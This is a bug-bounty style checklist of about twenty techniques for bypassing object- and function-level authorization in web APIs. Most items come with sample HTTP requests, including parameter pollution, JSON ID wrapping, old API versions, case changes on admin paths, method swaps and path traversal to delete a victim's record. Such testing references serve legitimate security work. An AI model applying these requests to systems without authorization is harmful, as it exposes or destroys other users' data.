1. Bypass Object Level Authorization. Add parameters onto the endpoints if not present by default.
    1. GET /api_v1/messages → 200 OK vs GET /api_v1/messages?user_id=victim_uuid → 200 OK
  2. HTTP Parameter Pollution. Give multiple values for the same parameter.
    1. GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID GET /api_v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
  3. Change File type. Add different file extensions at the end, e.g. .json, .xml, .config
    1. GET /user_data/2341 → 401 Unauthorized GET /user_data/2341.json → 200 OK
  4. JSON Parameter Pollution
    1. POST /api/get_profile Content-Type: application/json {“user_id”:<legit_id>,”user_id”:<victim’s_id>}
  5. Wrap the ID with an array in the body.
    1. {“id”:111} → 401 Unauthriozied {“id”:[111]} → 200 OK
  6. Wrap the ID with a JSON object.
    1. {“id”:111} → 401 Unauthriozied {“id”:{“id”:111}} → 200 OK
  7. Test an outdated API version. Try different versions of the API.
    1. GET /v3/users_data/1234 → 403 Forbidden GET /v1/users_data/1234 → 200 OK
  8. Test the same web endpoint in mobile application
    1. Sometimes the web application might be using encoded or hashed ids but the mobile endpoint still uses numeric ids
  9. Do not giveup on Error messages
    1. Sometimes applications will throw an error message even if the request was executed successfully at the backend
  10. Bruteforce Hidden HTTP Parameters
    1. Use tools like Arjun, paramminer which bruteforces common id parameter names against the endpoint to see if any of them works
  11. Google Dorking/ Public Forums
    1. Search all the endpoints having ID's which the search engine may have already indexed
  12. Never ignore encoded/ hashed ID's
    1. For hashed ID's, create multiple accounts and understand the pattern application uses to allot an ID
  13. Send Wildcard instead of an ID
    1. GET /api/users/<user_id>/ → GET /api/users/*
  14. Swap 2 UUID. Create 2 accounts and swap each other's UUID. (Autorize Burp plugin)
    1. GET /v1/orders?cartid=account_2 → 200 OK
  15. Missing Function Level Access Control (MFLAC)
    1. GET /admin/profile → 401 Unauthorized GET /ADMIN/profile → 200 OK
  16. Swap non-numeric with numeric ID's
    1. GET /file?id=90ri2xozifke29ikedaw0d GET /file?id=302
  17. Change Request Content-Type
    1. Content-type: application/xml → Content-type: application/json
  18. Path Traversal Secondary Context Path Traversal techniques
    1. POST /users/delete/VICTIM_ID → 403 Forbidden POST /users/delete/MY_ID/../VICTIM_ID → 200 OK
  19. Change HTTP method
    1. GET /users/delete/VICTIM_ID → 403 Forbidden POST /users/delete/VICTIM_ID → 200 OK
  20. Created by: Mufaddal Masalawala Twitter: @muffymas notes.mufaddal.info